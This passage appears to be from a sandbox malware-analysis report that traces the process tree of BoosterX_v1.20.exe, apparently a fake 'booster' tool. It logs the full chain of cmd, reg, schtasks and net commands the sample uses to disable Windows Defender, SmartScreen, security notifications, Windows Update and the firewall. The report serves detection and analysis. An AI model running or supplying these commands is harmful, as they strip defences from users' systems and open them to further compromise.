      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5016 /prefetch:2
      - Suspicious behavior: EnumeratesProcesses

  [2] C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4340 /prefetch:8

  [2] C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2092 /prefetch:8

  [2] C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2736 /prefetch:8
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4596 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4620 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1240 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5108 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=908 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2120 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=976 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4608 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5980 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5516 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2868 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4608 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4808 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3196 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1148 /prefetch:82⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\Desktop\BoosterX_v1.20.exe"C:\Users\Admin\Desktop\BoosterX_v1.20.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\Desktop\BoosterX_v1.20.exe/supertoken /command:"cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f" /hidden2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Desktop\BoosterX_v1.20.exe/command:"cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f" /hidden3⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend /v Start /t REG_DWORD /d 4 /f4⤵
-
C:\Users\Admin\Desktop\BoosterX_v1.20.exe/supertoken /command:"cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f" /hidden2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Desktop\BoosterX_v1.20.exe/command:"cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f" /hidden3⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService /v Start /t REG_DWORD /d 4 /f4⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService /v Start /t REG_DWORD /d 4 /f5⤵
-
C:\Users\Admin\Desktop\BoosterX_v1.20.exe/supertoken /command:"cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f" /hidden2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Desktop\BoosterX_v1.20.exe/command:"cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f" /hidden3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisSvc /v Start /t REG_DWORD /d 4 /f4⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisSvc /v Start /t REG_DWORD /d 4 /f5⤵
-
C:\Users\Admin\Desktop\BoosterX_v1.20.exe/supertoken /command:"cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t REG_DWORD /d "4" /f" /hidden2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Desktop\BoosterX_v1.20.exe/command:"cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t REG_DWORD /d "4" /f" /hidden3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense /v Start /t REG_DWORD /d 4 /f4⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense /v Start /t REG_DWORD /d 4 /f5⤵
-
C:\Users\Admin\Desktop\BoosterX_v1.20.exe/supertoken /command:"cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t REG_DWORD /d "4" /f" /hidden2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Desktop\BoosterX_v1.20.exe/command:"cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t REG_DWORD /d "4" /f" /hidden3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc /v Start /t REG_DWORD /d 4 /f4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t REG_SZ /d "Anywhere" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t REG_SZ /d "Anywhere" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t REG_DWORD /d "4" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies security service
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exeReg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f3⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d "0" /f2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\Software\Policies\Microsoft\Windows\CurrentVersion\PushNotifications" /v "NoToastApplicationNotification" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Policies\Microsoft\Windows\CurrentVersion\PushNotifications" /v "NoToastApplicationNotification" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\Software\Policies\Microsoft\Windows\CurrentVersion\PushNotifications" /v "NoToastApplicationNotificationOnLockScreen" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Policies\Microsoft\Windows\CurrentVersion\PushNotifications" /v "NoToastApplicationNotificationOnLockScreen" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /F /FI "IMAGENAME eq SystemSettings.exe"2⤵
- Modifies security service
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "IMAGENAME eq SystemSettings.exe"3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop wuauserv & net stop UsoSvc2⤵
-
C:\Windows\system32\net.exenet stop wuauserv3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
-
C:\Windows\system32\net.exenet stop UsoSvc3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop UsoSvc4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\WindowsUpdate\DoNotConnectToWindowsUpdateInternetLocations" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\WindowsUpdate\DoNotConnectToWindowsUpdateInternetLocations" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\WindowsUpdate\SetDisableUXWUAccess" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\WindowsUpdate\SetDisableUXWUAccess" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\WindowsUpdate\ExcludeWUDriversInQualityUpdate" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\WindowsUpdate\ExcludeWUDriversInQualityUpdate" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\Schedule Scan Static Task" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\Schedule Scan Static Task" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\Start Oobe Expedite Work" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\Start Oobe Expedite Work" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\Schedule Scan" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\Schedule Scan" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\USO_UxBroker" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\USO_UxBroker" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\UpdateModelTask" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\UpdateModelTask" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\WaaSMedic\PerformRemediation" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\WaaSMedic\PerformRemediation" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv" /v "Start" /t REG_DWORD /d "4" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies security service
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsoSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsoSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS" /v "Start" /t REG_DWORD /d "4" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DoSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DoSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c rd /s /q C:\Windows\SoftwareDistribution2⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c md C:\Windows\SoftwareDistribution2⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d "0" /f3⤵
- Modifies firewall policy service
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v "EnableFirewall" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v "EnableFirewall" /t REG_DWORD /d "0" /f3⤵
- Modifies firewall policy service
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\Control Panel\Mouse" /v "MouseSpeed" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Mouse" /v "MouseSpeed" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\Control Panel\Mouse" /v "MouseThreshold1" /t REG_DWORD /d "0" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Mouse" /v "MouseThreshold1" /t REG_DWORD /d "0" /f3⤵
-
